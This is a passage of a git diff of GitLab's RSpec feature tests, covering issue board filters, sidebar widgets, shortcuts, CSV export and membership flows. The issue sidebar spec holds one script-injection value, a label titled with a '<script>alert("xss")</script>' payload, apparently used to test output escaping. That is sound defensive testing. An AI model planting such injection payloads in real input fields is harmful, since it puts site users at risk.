expect(find('.board-card')).to have_content(issue_2.title) + end + end + + describe 'filters by releases' do + before do + set_filter('release') + end + + it 'loads all the releases when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + click_on release.tag + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_1.title) + end + end + + describe 'filters by confidentiality' do + before do + filter_input.click + filter_input.set("confidential:") + end + + it 'loads all the confidentiality options when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + filter_dropdown.click_on 'Yes' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_2.title) + end + end + + describe 'filters by milestone' do + before do + set_filter('milestone') + end + + it 'loads all the milestones when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 6) + expect(filter_dropdown).to have_content('None') + expect(filter_dropdown).to have_content('Any') + expect(filter_dropdown).to have_content('Started') + expect(filter_dropdown).to have_content('Upcoming') + expect(filter_dropdown).to have_content(milestone_1.title) + expect(filter_dropdown).to have_content(milestone_2.title) + + click_on milestone_1.title + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + end + end + + describe 'filters by 
reaction emoji' do + before do + set_filter('my-reaction') + end + + it 'loads all the emojis when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + click_on 'thumbsup' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_1.title) + end + end + + describe 'filters by type' do + let_it_be(:incident) { create(:incident, project: project)} + + before do + set_filter('type') + end + + it 'loads all the types when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 3) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + click_on 'Incident' + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(incident.title) + end + end + + def set_filter(filter) + filter_input.click + filter_input.set("#{filter}:") + filter_first_suggestion.click # Select `=` operator + end + + def expect_filtered_search_dropdown_results(filter_dropdown, count) + expect(filter_dropdown).to have_selector('.gl-new-dropdown-item', count: count) + end + + def visit_project_board + visit project_board_path(project, board) + wait_for_requests + end +end diff --git a/spec/features/boards/sidebar_due_date_spec.rb b/spec/features/boards/sidebar_due_date_spec.rb deleted file mode 100644 index 141c574ffec..00000000000 --- a/spec/features/boards/sidebar_due_date_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Project issue boards sidebar due date', :js do - include BoardHelpers - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, :public) } - let_it_be(:issue) { create(:issue, 
project: project, relative_position: 1) } - let_it_be(:board) { create(:board, project: project) } - let_it_be(:list) { create(:list, board: board, position: 0) } - - let(:card) { find('.board:nth-child(1)').first('.board-card') } - - around do |example| - freeze_time { example.run } - end - - before do - project.add_maintainer(user) - - sign_in(user) - - visit project_board_path(project, board) - wait_for_requests - end - - context 'due date' do - it 'updates due date' do - click_card(card) - - page.within('[data-testid="sidebar-due-date"]') do - today = Date.today.day - - click_button 'Edit' - - click_button today.to_s - - wait_for_requests - - expect(page).to have_content(today.to_s(:medium)) - end - end - end -end diff --git a/spec/features/boards/sidebar_milestones_spec.rb b/spec/features/boards/sidebar_milestones_spec.rb deleted file mode 100644 index be7435263b1..00000000000 --- a/spec/features/boards/sidebar_milestones_spec.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Project issue boards sidebar milestones', :js do - include BoardHelpers - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, :public) } - let_it_be(:milestone) { create(:milestone, project: project) } - let_it_be(:issue1) { create(:issue, project: project, relative_position: 1) } - let_it_be(:issue2) { create(:issue, project: project, milestone: milestone, relative_position: 2) } - let_it_be(:board) { create(:board, project: project) } - let_it_be(:list) { create(:list, board: board, position: 0) } - - let(:card1) { find('.board:nth-child(1) .board-card:nth-of-type(1)') } - let(:card2) { find('.board:nth-child(1) .board-card:nth-of-type(2)') } - - before do - project.add_maintainer(user) - - sign_in(user) - - visit project_board_path(project, board) - wait_for_requests - end - - context 'milestone' do - it 'adds a milestone' do - click_card(card1) - - page.within('[data-testid="sidebar-milestones"]') do 
- click_button 'Edit' - - wait_for_requests - - click_button milestone.title - - wait_for_requests - - page.within('[data-testid="select-milestone"]') do - expect(page).to have_content(milestone.title) - end - end - end - - it 'removes a milestone' do - click_card(card2) - - page.within('[data-testid="sidebar-milestones"]') do - click_button 'Edit' - - wait_for_requests - - click_button "No milestone" - - wait_for_requests - - page.within('[data-testid="select-milestone"]') do - expect(page).not_to have_content(milestone.title) - end - end - end - end -end diff --git a/spec/features/clusters/create_agent_spec.rb b/spec/features/clusters/create_agent_spec.rb index f40932c4750..7ed31a8c549 100644 --- a/spec/features/clusters/create_agent_spec.rb +++ b/spec/features/clusters/create_agent_spec.rb @@ -25,13 +25,13 @@ RSpec.describe 'Cluster agent registration', :js do it 'allows the user to select an agent to install, and displays the resulting agent token' do click_button('Actions') - expect(page).to have_content('Install new Agent') + expect(page).to have_content('Register') - click_button('Select an Agent') + click_button('Select an agent') click_button('example-agent-2') - click_button('Register Agent') + click_button('Register') - expect(page).to have_content('The token value will not be shown again after you close this window.') + expect(page).to have_content('You cannot see this token again after you close this window.') expect(page).to have_content('example-agent-token') expect(page).to have_content('docker run --pull=always --rm') diff --git a/spec/features/commits_spec.rb b/spec/features/commits_spec.rb index 2dafaedd262..4378e88f7c1 100644 --- a/spec/features/commits_spec.rb +++ b/spec/features/commits_spec.rb @@ -24,14 +24,15 @@ RSpec.describe 'Commits' do end context 'commit status is Generic Commit Status' do - let!(:status) { create(:generic_commit_status, pipeline: pipeline) } + let!(:status) { create(:generic_commit_status, pipeline: pipeline, ref: 
pipeline.ref) } before do project.add_reporter(user) end - describe 'Commit builds' do + describe 'Commit builds with jobs_tab_feature flag off' do before do + stub_feature_flags(jobs_tab_vue: false) visit pipeline_path(pipeline) end @@ -89,8 +90,9 @@ RSpec.describe 'Commits' do end end - context 'Download artifacts' do + context 'Download artifacts with jobs_tab_vue feature flag off' do before do + stub_feature_flags(jobs_tab_vue: false) create(:ci_job_artifact, :archive, file: artifacts_file, job: build) end @@ -118,8 +120,9 @@ RSpec.describe 'Commits' do end end - context "when logged as reporter" do + context "when logged as reporter and with jobs_tab_vue feature flag off" do before do + stub_feature_flags(jobs_tab_vue: false) project.add_reporter(user) create(:ci_job_artifact, :archive, file: artifacts_file, job: build) visit pipeline_path(pipeline) diff --git a/spec/features/dashboard/issues_spec.rb b/spec/features/dashboard/issues_spec.rb index 0b2811618b5..a9fb6a2ae7e 100644 --- a/spec/features/dashboard/issues_spec.rb +++ b/spec/features/dashboard/issues_spec.rb @@ -49,7 +49,7 @@ RSpec.describe 'Dashboard Issues' do describe 'new issue dropdown' do it 'shows projects only with issues feature enabled', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do expect(page).to have_content(project.full_name) @@ -58,7 +58,7 @@ RSpec.describe 'Dashboard Issues' do end it 'shows the new issue page', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' wait_for_requests diff --git a/spec/features/dashboard/merge_requests_spec.rb b/spec/features/dashboard/merge_requests_spec.rb index aa2485d4236..6239702edde 100644 --- a/spec/features/dashboard/merge_requests_spec.rb +++ b/spec/features/dashboard/merge_requests_spec.rb @@ -34,7 +34,7 @@ RSpec.describe 'Dashboard Merge Requests' do end it 'shows projects only with merge requests feature enabled', :js do - 
find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do expect(page).to have_content(project.full_name) diff --git a/spec/features/dashboard/milestones_spec.rb b/spec/features/dashboard/milestones_spec.rb index 992ed2f2ce6..1ba16bf879a 100644 --- a/spec/features/dashboard/milestones_spec.rb +++ b/spec/features/dashboard/milestones_spec.rb @@ -35,7 +35,7 @@ RSpec.describe 'Dashboard > Milestones' do describe 'new milestones dropdown', :js do it 'takes user to a new milestone page', :js do - find('.new-project-item-select-button').click + click_button 'Toggle project select' page.within('.select2-results') do first('.select2-result-label').click diff --git a/spec/features/dashboard/root_spec.rb b/spec/features/dashboard/root_spec.rb deleted file mode 100644 index 55bb43c6fcf..00000000000 --- a/spec/features/dashboard/root_spec.rb +++ /dev/null @@ -1,19 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'Root path' do - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } - - before do - project.add_developer(user) - sign_in(user) - end - - it 'shows the customize banner', :js do - visit root_path - - expect(page).to have_content('Do you want to customize this page?') - end -end diff --git a/spec/features/expand_collapse_diffs_spec.rb b/spec/features/expand_collapse_diffs_spec.rb index add4af2bcdb..63e16946a0b 100644 --- a/spec/features/expand_collapse_diffs_spec.rb +++ b/spec/features/expand_collapse_diffs_spec.rb @@ -7,7 +7,6 @@ RSpec.describe 'Expand and collapse diffs', :js do let(:project) { create(:project, :repository) } before do - stub_feature_flags(increased_diff_limits: false) allow(Gitlab::CurrentSettings).to receive(:diff_max_patch_bytes).and_return(100.kilobytes) admin = create(:admin) diff --git a/spec/features/gitlab_experiments_spec.rb b/spec/features/gitlab_experiments_spec.rb index 76b418adcea..ca772680ff6 100644 --- 
a/spec/features/gitlab_experiments_spec.rb +++ b/spec/features/gitlab_experiments_spec.rb @@ -31,9 +31,10 @@ RSpec.describe "Gitlab::Experiment", :js do expect(page).to have_content('Abuse Reports') - published_experiments = page.evaluate_script('window.gon.experiment') + published_experiments = page.evaluate_script('window.gl.experiments') expect(published_experiments).to include({ 'null_hypothesis' => { + 'excluded' => false, 'experiment' => 'null_hypothesis', 'key' => anything, 'variant' => 'candidate' diff --git a/spec/features/global_search_spec.rb b/spec/features/global_search_spec.rb index a380edff3a4..0397e72502a 100644 --- a/spec/features/global_search_spec.rb +++ b/spec/features/global_search_spec.rb @@ -57,6 +57,14 @@ RSpec.describe 'Global search' do expect(page).to have_selector('.search-form') expect(page).to have_no_selector('#js-header-search') end + + it 'focuses search input when shortcut "s" is pressed', :js do + expect(page).not_to have_selector('#search:focus') + + find('body').native.send_key('s') + + expect(page).to have_selector('#search:focus') + end end describe 'when new_header_search feature is enabled' do @@ -70,5 +78,13 @@ RSpec.describe 'Global search' do expect(page).to have_no_selector('.search-form') expect(page).to have_selector('#js-header-search') end + + it 'focuses search input when shortcut "s" is pressed', :js do + expect(page).not_to have_selector('#search:focus') + + find('body').native.send_key('s') + + expect(page).to have_selector('#search:focus') + end end end diff --git a/spec/features/groups/container_registry_spec.rb b/spec/features/groups/container_registry_spec.rb index 098559dc3f8..f5af9ba8b7b 100644 --- a/spec/features/groups/container_registry_spec.rb +++ b/spec/features/groups/container_registry_spec.rb @@ -82,7 +82,7 @@ RSpec.describe 'Container Registry', :js do end it 'shows the image tags' do - expect(page).to have_content 'Image tags' + expect(page).to have_content '1 tag' first_tag = 
first('[data-testid="name"]') expect(first_tag).to have_content 'latest' end diff --git a/spec/features/groups/empty_states_spec.rb b/spec/features/groups/empty_states_spec.rb index 4488f53a03f..0317f9162cc 100644 --- a/spec/features/groups/empty_states_spec.rb +++ b/spec/features/groups/empty_states_spec.rb @@ -101,7 +101,7 @@ RSpec.describe 'Group empty states' do it "the new #{issuable_name} button opens a project dropdown" do within '.empty-state' do - find('.new-project-item-select-button').click + click_button 'Toggle project select' end expect(page).to have_selector('.ajax-project-dropdown') diff --git a/spec/features/groups/issues_spec.rb b/spec/features/groups/issues_spec.rb index 4e59ab40d04..1bac1bcdf5a 100644 --- a/spec/features/groups/issues_spec.rb +++ b/spec/features/groups/issues_spec.rb @@ -119,8 +119,9 @@ RSpec.describe 'Group issues page' do end it 'shows projects only with issues feature enabled', :js do - find('.empty-state .js-lazy-loaded') - find('.empty-state .new-project-item-link').click + within '.empty-state' do + click_button 'Toggle project select' + end page.within('.select2-results') do expect(page).to have_content(project.full_name) @@ -158,9 +159,7 @@ RSpec.describe 'Group issues page' do it 'each issue item has a user-can-drag css applied' do visit issues_group_path(group, sort: 'relative_position') - page.within('.manual-ordering') do - expect(page).to have_selector('.issue.user-can-drag', count: 3) - end + expect(page).to have_selector('.issue.user-can-drag', count: 3) end it 'issues should be draggable and persist order' do @@ -224,7 +223,8 @@ RSpec.describe 'Group issues page' do end it 'shows the pagination' do - expect(page).to have_selector('.gl-pagination') + expect(page).to have_link 'Prev' + expect(page).to have_link 'Next' end it 'first pagination item is active' do diff --git a/spec/features/groups/members/manage_groups_spec.rb b/spec/features/groups/members/manage_groups_spec.rb index d822a5ea871..2beecda23b5 100644 
--- a/spec/features/groups/members/manage_groups_spec.rb +++ b/spec/features/groups/members/manage_groups_spec.rb @@ -6,6 +6,7 @@ RSpec.describe 'Groups > Members > Manage groups', :js do include Select2Helper include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:user) } @@ -92,7 +93,7 @@ RSpec.describe 'Groups > Members > Manage groups', :js do click_button 'Remove group' end - page.within('[role="dialog"]') do + within_modal do click_button('Remove group') end diff --git a/spec/features/groups/members/manage_members_spec.rb b/spec/features/groups/members/manage_members_spec.rb index 38e829bafcc..0ce50107e54 100644 --- a/spec/features/groups/members/manage_members_spec.rb +++ b/spec/features/groups/members/manage_members_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Groups > Members > Manage members' do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user1) { create(:user, name: 'John Doe') } let_it_be(:user2) { create(:user, name: 'Mary Jane') } @@ -84,33 +85,6 @@ RSpec.describe 'Groups > Members > Manage members' do property: 'existing_user', user: user1 ) - expect_no_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus' - ) - end - - it 'adds a user to group with area_of_focus', :js, :snowplow, :aggregate_failures do - stub_experiments(member_areas_of_focus: :candidate) - group.add_owner(user1) - - visit group_group_members_path(group) - - invite_member(user2.name, role: 'Reporter', area_of_focus: true) - wait_for_requests - - expect_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus', - label: 'Contribute to the codebase', - property: group.members.last.id.to_s - ) - expect_snowplow_event( - category: 
'Members::CreateService', - action: 'area_of_focus', - label: 'Collaborate on open issues and merge requests', - property: group.members.last.id.to_s - ) end it 'do not disclose email addresses', :js do @@ -170,7 +144,7 @@ RSpec.describe 'Groups > Members > Manage members' do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end @@ -220,36 +194,9 @@ RSpec.describe 'Groups > Members > Manage members' do property: 'net_new_user', user: user1 ) - expect_no_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus' - ) end end - it 'invite user to group with area_of_focus', :js, :snowplow, :aggregate_failures do - stub_experiments(member_areas_of_focus: :candidate) - group.add_owner(user1) - - visit group_group_members_path(group) - - invite_member('test@example.com', role: 'Reporter', area_of_focus: true) - wait_for_requests - - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Contribute to the codebase', - property: group.members.last.id.to_s - ) - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Collaborate on open issues and merge requests', - property: group.members.last.id.to_s - ) - end - context 'when user is a guest' do before do group.add_guest(user1) diff --git a/spec/features/groups/navbar_spec.rb b/spec/features/groups/navbar_spec.rb index 22409e9e7f6..da8032dc4dd 100644 --- a/spec/features/groups/navbar_spec.rb +++ b/spec/features/groups/navbar_spec.rb @@ -14,7 +14,6 @@ RSpec.describe 'Group navbar' do before do insert_package_nav(_('Kubernetes')) - stub_feature_flags(group_iterations: false) stub_feature_flags(customer_relations: false) stub_config(dependency_proxy: { enabled: false }) stub_config(registry: { enabled: false }) diff --git a/spec/features/help_pages_spec.rb 
b/spec/features/help_pages_spec.rb index 66ba4dc987c..a1e2990202c 100644 --- a/spec/features/help_pages_spec.rb +++ b/spec/features/help_pages_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Help Pages' do stub_application_setting(version_check_enabled: true) stub_rails_env('production') - allow(VersionCheck).to receive(:url).and_return('/version-check-url') + allow(VersionCheck).to receive(:image_url).and_return('/version-check-url') sign_in(create(:user)) visit help_path diff --git a/spec/features/ide/clientside_preview_csp_spec.rb b/spec/features/ide/clientside_preview_csp_spec.rb index 559edb8bf53..849fdb0a44c 100644 --- a/spec/features/ide/clientside_preview_csp_spec.rb +++ b/spec/features/ide/clientside_preview_csp_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'IDE Clientside Preview CSP' do end it_behaves_like 'setting CSP', 'frame-src' do - let(:whitelisted_url) { 'https://sandbox.gitlab-static.test' } + let(:allowlisted_url) { 'https://sandbox.gitlab-static.test' } let(:extended_controller_class) { IdeController } subject do @@ -23,7 +23,7 @@ RSpec.describe 'IDE Clientside Preview CSP' do before do stub_application_setting(web_ide_clientside_preview_enabled: true) - stub_application_setting(web_ide_clientside_preview_bundler_url: whitelisted_url) + stub_application_setting(web_ide_clientside_preview_bundler_url: allowlisted_url) sign_in(user) end diff --git a/spec/features/ide/static_object_external_storage_csp_spec.rb b/spec/features/ide/static_object_external_storage_csp_spec.rb index 24d37f25739..421b5db0dbb 100644 --- a/spec/features/ide/static_object_external_storage_csp_spec.rb +++ b/spec/features/ide/static_object_external_storage_csp_spec.rb @@ -12,7 +12,7 @@ RSpec.describe 'Static Object External Storage Content Security Policy' do end it_behaves_like 'setting CSP', 'connect-src' do - let_it_be(:whitelisted_url) { 'https://static-objects.test' } + let_it_be(:allowlisted_url) { 'https://static-objects.test' } let_it_be(:extended_controller_class) { 
IdeController } subject do @@ -22,7 +22,7 @@ RSpec.describe 'Static Object External Storage Content Security Policy' do end before do - allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_url).and_return(whitelisted_url) + allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_url).and_return(allowlisted_url) allow_any_instance_of(ApplicationSetting).to receive(:static_objects_external_storage_auth_token).and_return('letmein') sign_in(user) diff --git a/spec/features/invites_spec.rb b/spec/features/invites_spec.rb index f9ab780d2d6..9cb9416e7a0 100644 --- a/spec/features/invites_spec.rb +++ b/spec/features/invites_spec.rb @@ -226,34 +226,6 @@ RSpec.describe 'Group or Project invitations', :aggregate_failures do end end - context 'with invite email acceptance for the invite_email_preview_text experiment', :experiment do - let(:extra_params) do - { invite_type: Emails::Members::INITIAL_INVITE, experiment_name: 'invite_email_preview_text' } - end - - it 'tracks the accepted invite' do - expect(experiment(:invite_email_preview_text)).to track(:accepted) - .with_context(actor: group_invite) - .on_next_instance - - fill_in_sign_up_form(new_user) - end - end - - context 'with invite email acceptance for the invite_email_from experiment', :experiment do - let(:extra_params) do - { invite_type: Emails::Members::INITIAL_INVITE, experiment_name: 'invite_email_from' } - end - - it 'tracks the accepted invite' do - expect(experiment(:invite_email_from)).to track(:accepted) - .with_context(actor: group_invite) - .on_next_instance - - fill_in_sign_up_form(new_user) - end - end - it 'signs up and redirects to the group activity page with all the project/groups invitation automatically accepted' do fill_in_sign_up_form(new_user) fill_in_welcome_form diff --git a/spec/features/issuables/shortcuts_issuable_spec.rb b/spec/features/issuables/shortcuts_issuable_spec.rb index 78cd8d0bef3..7e8f39c47a7 100644 --- 
a/spec/features/issuables/shortcuts_issuable_spec.rb +++ b/spec/features/issuables/shortcuts_issuable_spec.rb @@ -44,4 +44,90 @@ RSpec.describe 'Blob shortcuts', :js do include_examples 'quotes the selected text' end end + + shared_examples "opens assignee dropdown for editing" do + it "opens assignee dropdown for editing" do + find('body').native.send_key('a') + + expect(find('.block.assignee')).to have_selector('.js-sidebar-assignee-data') + end + end + + describe 'pressing "a"' do + describe 'On an Issue' do + before do + stub_feature_flags(issue_assignees_widget: false) + visit project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens assignee dropdown for editing' + end + + describe 'On a Merge Request' do + before do + stub_feature_flags(issue_assignees_widget: false) + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens assignee dropdown for editing' + end + end + + shared_examples "opens milestones dropdown for editing" do + it "opens milestones dropdown for editing" do + find('body').native.send_key('m') + + expect(find('[data-testid="milestone-edit"]')).to have_selector('.gl-new-dropdown-inner') + end + end + + describe 'pressing "m"' do + describe 'On an Issue' do + before do + visit project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens milestones dropdown for editing' + end + + describe 'On a Merge Request' do + before do + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens milestones dropdown for editing' + end + end + + shared_examples "opens labels dropdown for editing" do + it "opens labels dropdown for editing" do + find('body').native.send_key('l') + + expect(find('.js-labels-block')).to have_selector('[data-testid="labels-select-dropdown-contents"]') + end + end + + describe 'pressing "l"' do + describe 'On an Issue' do + before do + visit 
project_issue_path(project, issue) + wait_for_requests + end + + include_examples 'opens labels dropdown for editing' + end + + describe 'On a Merge Request' do + before do + visit project_merge_request_path(project, merge_request) + wait_for_requests + end + + include_examples 'opens labels dropdown for editing' + end + end end diff --git a/spec/features/issuables/sorting_list_spec.rb b/spec/features/issuables/sorting_list_spec.rb index 6e07c6ffed2..f646cdbd71b 100644 --- a/spec/features/issuables/sorting_list_spec.rb +++ b/spec/features/issuables/sorting_list_spec.rb @@ -197,17 +197,13 @@ RSpec.describe 'Sort Issuable List' do click_button('Created date') click_on('Last updated') - wait_for_requests - - expect(first_issue).to include(last_updated_issuable.title) - expect(last_issue).to include(first_updated_issuable.title) + expect(page).to have_css('.issue:first-child', text: last_updated_issuable.title) + expect(page).to have_css('.issue:last-child', text: first_updated_issuable.title) click_on 'Sort direction' - wait_for_requests - - expect(first_issue).to include(first_updated_issuable.title) - expect(last_issue).to include(last_updated_issuable.title) + expect(page).to have_css('.issue:first-child', text: first_updated_issuable.title) + expect(page).to have_css('.issue:last-child', text: last_updated_issuable.title) end end end diff --git a/spec/features/issues/csv_spec.rb b/spec/features/issues/csv_spec.rb index b4c737495b4..9fd171bf44b 100644 --- a/spec/features/issues/csv_spec.rb +++ b/spec/features/issues/csv_spec.rb @@ -47,13 +47,13 @@ RSpec.describe 'Issues csv', :js do expect(page).to have_content "emailed to #{user.notification_email_or_default}" end - it 'includes a csv attachment', :sidekiq_might_not_need_inline do + it 'includes a csv attachment', :sidekiq_inline do request_csv expect(attachment.content_type).to include('text/csv') end - it 'ignores pagination', :sidekiq_might_not_need_inline do + it 'ignores pagination', :sidekiq_inline do 
create_list(:issue, 30, project: project, author: user) request_csv @@ -61,13 +61,13 @@ RSpec.describe 'Issues csv', :js do expect(csv.count).to eq 31 end - it 'uses filters from issue index', :sidekiq_might_not_need_inline do + it 'uses filters from issue index', :sidekiq_inline do request_csv(state: :closed) expect(csv.count).to eq 0 end - it 'ignores sorting from issue index', :sidekiq_might_not_need_inline do + it 'ignores sorting from issue index', :sidekiq_inline do issue2 = create(:labeled_issue, project: project, author: user, labels: [feature_label]) request_csv(sort: :label_priority) @@ -76,23 +76,11 @@ RSpec.describe 'Issues csv', :js do expect(csv.map { |row| row['Issue ID'] }).to eq expected end - it 'uses array filters, such as label_name', :sidekiq_might_not_need_inline do + it 'uses array filters, such as label_name', :sidekiq_inline do issue.update!(labels: [idea_label]) request_csv("label_name[]" => 'Bug') expect(csv.count).to eq 0 end - - it 'avoids excessive database calls' do - control_count = ActiveRecord::QueryRecorder.new { request_csv }.count - create_list(:labeled_issue, - 10, - project: project, - assignees: [user], - author: user, - milestone: milestone, - labels: [feature_label, idea_label]) - expect { request_csv }.not_to exceed_query_limit(control_count + 5) - end end diff --git a/spec/features/issues/gfm_autocomplete_spec.rb b/spec/features/issues/gfm_autocomplete_spec.rb index 0cefbae4d37..b0e4729db8b 100644 --- a/spec/features/issues/gfm_autocomplete_spec.rb +++ b/spec/features/issues/gfm_autocomplete_spec.rb @@ -180,7 +180,7 @@ RSpec.describe 'GFM autocomplete', :js do describe 'assignees' do it 'does not wrap with quotes for assignee values' do - fill_in 'Comment', with: "@#{user.username[0]}" + fill_in 'Comment', with: "@#{user.username}" find_highlighted_autocomplete_item.click diff --git a/spec/features/issues/issue_header_spec.rb b/spec/features/issues/issue_header_spec.rb index cf375d8fb67..3e27ce81860 100644 --- 
a/spec/features/issues/issue_header_spec.rb +++ b/spec/features/issues/issue_header_spec.rb @@ -4,7 +4,8 @@ require 'spec_helper' RSpec.describe 'issue header', :js do let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } let_it_be(:issue) { create(:issue, project: project) } let_it_be(:closed_issue) { create(:issue, :closed, project: project) } let_it_be(:closed_locked_issue) { create(:issue, :closed, :locked, project: project) } @@ -12,7 +13,7 @@ RSpec.describe 'issue header', :js do context 'when user has permission to update' do before do - project.add_maintainer(user) + group.add_owner(user) sign_in(user) end @@ -24,9 +25,10 @@ RSpec.describe 'issue header', :js do click_button 'Issue actions' end - it 'only shows the "New issue" and "Report abuse" items', :aggregate_failures do + it 'shows the "New issue", "Report abuse", and "Delete issue" items', :aggregate_failures do expect(page).to have_link 'New issue' expect(page).to have_link 'Report abuse' + expect(page).to have_button 'Delete issue' expect(page).not_to have_link 'Submit as spam' end end @@ -116,6 +118,7 @@ RSpec.describe 'issue header', :js do expect(page).to have_link 'New issue' expect(page).to have_link 'Report abuse' expect(page).not_to have_link 'Submit as spam' + expect(page).not_to have_button 'Delete issue' end end diff --git a/spec/features/issues/issue_sidebar_spec.rb b/spec/features/issues/issue_sidebar_spec.rb index bd4be755a92..9da6694c681 100644 --- a/spec/features/issues/issue_sidebar_spec.rb +++ b/spec/features/issues/issue_sidebar_spec.rb @@ -11,7 +11,6 @@ RSpec.describe 'Issue Sidebar' do let_it_be(:label) { create(:label, project: project, title: 'bug') } let_it_be(:issue) { create(:labeled_issue, project: project, labels: [label]) } let_it_be(:mock_date) { Date.today.at_beginning_of_month + 2.days } - let_it_be(:issue_with_due_date) { create(:issue, project: 
project, due_date: mock_date) } let_it_be(:xss_label) { create(:label, project: project, title: '<script>alert("xss");</script>') } before do @@ -201,30 +200,6 @@ RSpec.describe 'Issue Sidebar' do end end - context 'due date widget', :js do - let(:due_date_value) { find('[data-testid="due-date"] [data-testid="sidebar-date-value"]') } - - context 'when no due date exists' do - before do - visit_issue(project, issue) - end - - it "displays 'None'" do - expect(due_date_value.text).to have_content 'None' - end - end - - context 'when due date exists' do - before do - visit_issue(project, issue_with_due_date) - end - - it "displays the due date" do - expect(due_date_value.text).to have_content mock_date.strftime('%b %-d, %Y') - end - end - end - context 'as an allowed user' do before do project.add_developer(user) @@ -259,37 +234,11 @@ RSpec.describe 'Issue Sidebar' do end context 'editing issue milestone', :js do - let_it_be(:milestone_expired) { create(:milestone, project: project, title: 'Foo - expired', due_date: 5.days.ago) } - let_it_be(:milestone_no_duedate) { create(:milestone, project: project, title: 'Foo - No due date') } - let_it_be(:milestone1) { create(:milestone, project: project, title: 'Milestone-1', due_date: 20.days.from_now) } - let_it_be(:milestone2) { create(:milestone, project: project, title: 'Milestone-2', due_date: 15.days.from_now) } - let_it_be(:milestone3) { create(:milestone, project: project, title: 'Milestone-3', due_date: 10.days.from_now) } - - before do - page.within('.block.milestone') do - click_button 'Edit' - end - - wait_for_all_requests - end - - it 'shows milestones list in the dropdown' do - page.within('.block.milestone') do - # 5 milestones + "No milestone" = 6 items - expect(page.find('.gl-new-dropdown-contents')).to have_selector('li.gl-new-dropdown-item', count: 6) - end - end - - it 'shows expired milestone at the bottom of the list and milestone due earliest at the top of the list', :aggregate_failures do - 
page.within('.block.milestone .gl-new-dropdown-contents') do - expect(page.find('li:last-child')).to have_content milestone_expired.title + it_behaves_like 'milestone sidebar widget' + end - expect(page.all('li.gl-new-dropdown-item')[1]).to have_content milestone3.title - expect(page.all('li.gl-new-dropdown-item')[2]).to have_content milestone2.title - expect(page.all('li.gl-new-dropdown-item')[3]).to have_content milestone1.title - expect(page.all('li.gl-new-dropdown-item')[4]).to have_content milestone_no_duedate.title - end - end + context 'editing issue due date', :js do + it_behaves_like 'date sidebar widget' end context 'editing issue labels', :js do diff --git a/spec/features/issues/user_bulk_edits_issues_labels_spec.rb b/spec/features/issues/user_bulk_edits_issues_labels_spec.rb index 97df2d0208b..71213fb661f 100644 --- a/spec/features/issues/user_bulk_edits_issues_labels_spec.rb +++ b/spec/features/issues/user_bulk_edits_issues_labels_spec.rb @@ -12,6 +12,9 @@ RSpec.describe 'Issues > Labels bulk assignment' do let!(:issue1) { create(:issue, project: project, title: "Issue 1", labels: [frontend]) } let!(:issue2) { create(:issue, project: project, title: "Issue 2") } + let(:issue_1_selector) { "#issue_#{issue1.id}" } + let(:issue_2_selector) { "#issue_#{issue2.id}" } + context 'as an allowed user', :js do before do project.add_maintainer(user) @@ -44,10 +47,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - 